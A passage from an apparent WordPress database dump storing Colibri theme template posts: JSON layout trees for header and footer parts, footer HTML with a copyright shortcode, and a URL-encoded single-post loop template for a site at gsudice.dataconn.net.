erticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','publish','closed','closed','','26','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=26',0,'extb_post_json','',0),(28,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','footer_post','','publish','closed','closed','','28','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?post_type=extb_post_footer&p=28',0,'extb_post_footer','',0),(29,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','publish','closed','closed','','29','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=29',0,'extb_post_json','',0),(31,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"31-m1\" class=\"style-66 style-local-31-m1 h-overflow-hidden position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"31-m2\" id=\"blog-post\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-67 style-local-31-m2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"31-m3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 colibri-dynamic-list colibri-single-post-loop style-72 style-local-31-m3 position-relative\">\n <!---->\n <div data-colibri-component=\"\" class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <!---->[colibri_loop]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-73-outer%20style-local-31-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%2231-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-73%20style-local-31-m4%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%2231-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-74%20style-local-31-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-31-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22false%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2231-m6%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-75%20style-local-31-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-76-outer%20style-local-31-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-76%20style-local-31-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m8%22%20class=%22h-blog-meta%20style-77%20style-local-31-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2231-m9%22%20class=%22style-78%20style-local-31-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22colibri-post-content%20h-global-transition-all%22%3E%5Bcolibri_post_content%5D%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2231-m10%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-79%20style-local-31-m10%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-80-outer%20style-local-31-m11-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m11%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-80%20style-local-31-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m12%22%20class=%22h-text%20h-text-component%20style-81%20style-local-31-m12%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ECategories:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20style-82-outer%20style-local-31-m13-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-82%20style-local-31-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m14%22%20class=%22h-blog-categories%20style-83%20style-local-31-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%5Bcolibri_layout_wrapper%20name=%22tags_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2231-m15%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-84%20style-local-31-m15%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-center%20align-items-md-center%20align-items-center%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-85-outer%20style-local-31-m16-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m16%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-85%20style-local-31-m16%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m17%22%20class=%22h-text%20h-text-component%20style-86%20style-local-31-m17%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ETags:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-87-outer%20style-local-31-m18-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m18%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-87%20style-local-31-m18%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m19%22%20class=%22h-blog-tags%20empty-preview%20style-88%20style-local-31-m19%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_tags%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22navigation_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2231-m20%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-89%20style-local-31-m20%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-90-outer%20style-local-31-m21-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m21%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-90%20style-local-31-m21%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m22%22%20class=%22post-nav-button%20hide-title%20style-91%20style-local-31-m22%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22prev%22%20prev_post=%22Previous%20post%22%20next_post=%22Next%20post:%22%20show_title=%22false%22%20title_length=%2240%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-92-outer%20style-local-31-m23-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m23%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-92%20style-local-31-m23%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m24%22%20class=%22post-nav-button%20hide-title%20style-93%20style-local-31-m24%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22next%22%20prev_post=%22Previous%20post:%22%20next_post=%22Next%20post%22%20show_title=%22false%22%20title_length=%2230%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"31-m29\" id=\"comments\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-94 style-local-31-m29 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"31-m30\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-99 style-local-31-m30 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-100-outer style-local-31-m31-outer\">\n <div data-colibri-id=\"31-m31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-100 style-local-31-m31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"31-m32\" class=\"style-101 style-local-31-m32 position-relative\">\n <!---->\n <div class=\"h-global-transition-all blog-post-comments\">[colibri_post_comments none=\"No responses yet\" one=\"One response\" multiple=\"{COMMENTS-COUNT} Responses\" disabled=\"Comments are closed\" avatar_size=\"30\"]</div>\n </div>\n <div data-colibri-id=\"31-m33\" class=\"position-relative\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_post_comment_form]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_post','','publish','closed','closed','','31','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',0,'https://gsudice.dataconn.net/?post_type=extb_post_main&p=31',0,'extb_post_main','',0),(32,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"31-m27\",\"parentId\":\"31-m26\",\"partialId\":31,\"styleRef\":70,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"31-m28\",\"parentId\":\"31-m26\",\"partialId\":31,\"styleRef\":71,\"type\":\"main\"}],\"id\":\"31-m26\",\"parentId\":\"31-m25\",\"partialId\":31,\"styleRef\":69,\"type\":\"main\"}],\"id\":\"31-m25\",\"parentId\":\"31-m2\",\"partialId\":31,\"styleRef\":68,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-post-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-thumbnail\",\"id\":\"31-m5\",\"parentId\":\"31-m4\",\"partialId\":31,\"styleRef\":74,\"type\":\"main\",\"props\":{\"showPlaceholder\":false,\"addLink\":false}},{\"name\":\"hop-row\",\"id\":\"31-m6\",\"parentId\":\"31-m4\",\"partialId\":31,\"styleRef\":75,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"id\":\"31-m7\",\"parentId\":\"31-m6\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-meta\",\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m8\",\"partialId\":31,\"styleRef\":77,\"type\":\"main\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"showIcons\":false,\"separator\":\"\"}},{\"name\":\"hop-post-content\",\"parentId\":\"31-m7\",\"id\":\"31-m9\",\"partialId\":31,\"styleRef\":78,\"type\":\"main\"},{\"name\":\"hop-post-categories-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"31-m11\",\"parentId\":\"31-m10\",\"partialId\":31,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"31-m11\",\"index\":0,\"id\":\"31-m12\",\"partialId\":31,\"styleRef\":81,\"type\":\"main\",\"props\":{\"content\":\"<p>Categories:<\\/p>\"}}],\"styleRef\":80,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"31-m13\",\"parentId\":\"31-m10\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-categories\",\"slot\":null,\"parentId\":\"31-m13\",\"index\":0,\"id\":\"31-m14\",\"partialId\":31,\"styleRef\":83,\"type\":\"main\"}],\"styleRef\":82,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m10\",\"partialId\":31,\"styleRef\":79,\"type\":\"main\"},{\"name\":\"hop-post-t